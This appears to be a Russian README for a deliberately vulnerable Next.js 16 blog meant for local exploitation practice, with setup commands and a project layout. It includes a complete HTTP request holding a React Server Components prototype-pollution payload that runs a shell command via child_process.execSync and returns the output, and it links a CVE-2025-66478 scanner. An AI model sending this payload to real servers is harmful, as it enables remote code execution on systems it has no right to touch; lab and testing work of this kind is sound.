
ВАЖНО: Проект Next JS УЯЗВИМЫЙ создан только для образовательных целей, тестирования и эксплуатации, НЕ РЕКОМЕНДУЕТСЯ УСТАНОВКА В ПРОДУКЦИЮ, ТОЛЬКО ДЛЯ ЛОКАЛЬНОЙ СРЕДЫ ИЛИ КОНТРОЛИРУЕМОЙ СРЕДЫ.
Современный и элегантный блог, построенный на Next.js 16, React 19, shadcn/ui и Tailwind CSS.
Проект УЯЗВИМОГО Next JS, созданный исключительно для образовательных целей, тестирования и эксплуатации, НЕ РЕКОМЕНДУЕТСЯ К УСТАНОВКЕ В ПРОДАКШЕН, ТОЛЬКО ДЛЯ ЛОКАЛЬНОГО ИСПОЛЬЗОВАНИЯ ИЛИ КОНТРОЛИРУЕМОЙ СРЕДЫ.
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Ссылка: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478
npm install
# или
yarn install
# или
pnpm install
npm run dev
# или
yarn dev
# или
pnpm dev
├── app/ # Страницы Next.js
│ ├── blog/[id]/ # Страница деталей блога
│ ├── profile/ # Страница профиля
│ ├── layout.tsx # Основной layout
│ └── page.tsx # Главная страница
├── components/ # React-компоненты
│ ├── auth/ # Компоненты аутентификации
│ ├── blog/ # Компоненты блога
│ ├── layout/ # Компоненты макета
│ └── ui/ # Компоненты shadcn/ui
├── lib/ # Утилиты и сервисы
│ ├── auth.ts # Сервис аутентификации
│ ├── mocks.ts # Тестовые данные
│ └── utils.ts # Общие утилиты
└── public/ # Статические файлы
Все данные (блоги, пользователи, реакции) полностью имитированы и генерируются динамически. База данных не требуется.
Этот проект предназначен только для образовательных целей.